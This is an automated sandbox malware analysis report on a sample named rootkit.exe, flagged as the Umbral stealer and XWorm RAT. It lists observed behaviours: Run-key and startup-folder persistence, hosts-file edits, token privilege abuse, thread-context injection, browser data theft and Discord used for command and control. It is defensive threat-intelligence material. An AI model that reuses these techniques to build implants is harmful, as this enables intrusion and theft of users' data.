Malware Analysis Report

2024-10-10 09:55

Sample ID 240708-wax71atand
Target rootkit.exe
SHA256 f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
Tags
umbral xworm execution persistence rat spyware stealer trojan evasion
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Threat Level: Known bad

The file rootkit.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan evasion

Modifies security service

Xworm

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Xworm Payload

Umbral

Detect Umbral payload

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-08 17:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-08 17:43

Reported

2024-07-08 17:47

Platform

win10v2004-20240704-en

Max time kernel

150s

Max time network

125s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1912 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\XClient C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1912 set thread context of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720460785" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
